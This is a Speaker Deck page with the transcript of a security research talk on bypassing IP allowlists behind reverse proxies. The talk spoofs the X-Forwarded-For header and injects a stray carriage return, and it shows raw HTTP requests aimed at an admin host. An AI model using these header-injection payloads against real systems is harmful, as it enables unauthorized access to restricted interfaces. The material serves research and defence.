$30 off During Our Annual Pro Sale. View Details »

At Home Among Strangers

Bo0oM
December 06, 2019
Research
1
3k

At Home Among Strangers

Bypassing IP white sheets of some web applications due to incorrect parsing of HTTP request headers.

Bo0oM

December 06, 2019
Tweet

More Decks by Bo0oM

See All by Bo0oM
Защита от вредоносной автоматизации сегодня
bo0om
0
59
Defending against automatization using nginx
bo0om
0
250
Antibot pitch deck
bo0om
0
45
31337
bo0om
0
30
Your back is white
bo0om
0
110
FTP2RCE
bo0om
0
5.2k
Interpret it!
bo0om
0
880
2000day in Safari
bo0om
2
1.9k
Partyhack 3.0 - Telegram bugbounty writeup
bo0om
0
3.8k

Other Decks in Research

See All in Research
ユーザブルセキュリティの最新研究動向 (日本銀行 情報セキュリティ・セミナー) / Usable Security Seminar 2022
ayakohasegawa
0
350
構造を持った言語データと最適輸送
eumesy
PRO
5
5k
RecSys2022 論文読み会 | 【紹介】Tutorial: Psychology-informed Recommender Systems
zerebom
0
380
熊本都市交通リノベーション@JCOMM2022_データと新技術
trafficbrain
0
120
論文紹介 / Winoground: Probing Vision and Language Models for Visio-Linguistic Compositionality
kyoun
0
220
Federated Learning Tutorial (IBIS 2022)
osx
1
880
深層学習を用いた予測の不確実性-自然言語処理編-
masatoto
0
290
RecSys22読み会_MTRS
daimoriwaki
0
300
(最先端NLP2022)DiffCSE: Difference-based Contrastive Learning for Sentence Embeddings
chanabek326
2
420
Nyssa Packard - How To Run User Research At Any Scale – From Startup To Big Tech (Turing Fest 2022)
turingfest
PRO
0
130
研究会発表資料.pdf
supikiti
3
230
文章のなかの地理空間 - 地理空間情報科学(GIS)と自然言語処理(NLP)の融合へ向けて -
hiroki13
3
3.1k

Featured

See All Featured
Building an army of robots
kneath
301
40k
Side Projects
sachag
451
37k
Clear Off the Table
cherdarchuk
79
290k
Building Adaptive Systems
keathley
25
1.3k
5 minutes of I Can Smell Your CMS
philhawksworth
197
18k
Building a Scalable Design System with Sketch
lauravandoore
451
30k
Become a Pro
speakerdeck
PRO
3
3.1k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
6
780
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
21
1.6k
Fight the Zombie Pattern Library - RWD Summit 2016
marcelosomers
226
16k
For a Future-Friendly Web
brad_frost
166
7.7k
The Invisible Side of Design
smashingmag
292
48k

Transcript

  1. At Home Among Strangers Bypassing IP white sheets of some

    web applications due to incorrect parsing of HTTP request headers.

  2. Reverse Proxy

  3. None

  4. X-Forwarded-For: <client>, <proxy> X-Forwarded-For: <fake>, <client>, <proxy>

  5. HTTP-request GET / HTTP/1.1
 Host: admin.my.site
 Connection: close GET /

    HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <client>, <proxy>

  6. XFF/XRI Spoofing GET / HTTP/1.1
 Host: admin.my.site X-Forwarded-For: 127.0.0.1
 Connection:

    close GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1, 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <fake>, <client>, <proxy>

  7. HTTP-request GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\n
 Connection: close\r\n

    \r\n X-Forwarded-For: <fake>, <client>, <proxy>

  8. HTTP-request with 0d GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n


    Connection: close\r\n \r\n X-Forwarded-For: <fake>\r, <client>, <proxy>

  9. XFF/XRI Spoofing+ GET / HTTP/1.1\r\n
 Host: admin.my.site\r\n
 X-Forwarded-For: 127.0.0.1\r\r\n
 Connection:

    close\r\n \r\n GET / HTTP/1.1
 Host: admin.my.site
 X-Forwarded-For: 127.0.0.1 , 123.123.123.123, 192.168.1.1
 Connection: close X-Forwarded-For: <fake> , <client>, <proxy> Tomcat? WebSphere?

  10. Twi: @i_bo0om Site: bo0om.ru Telegram: @webpwn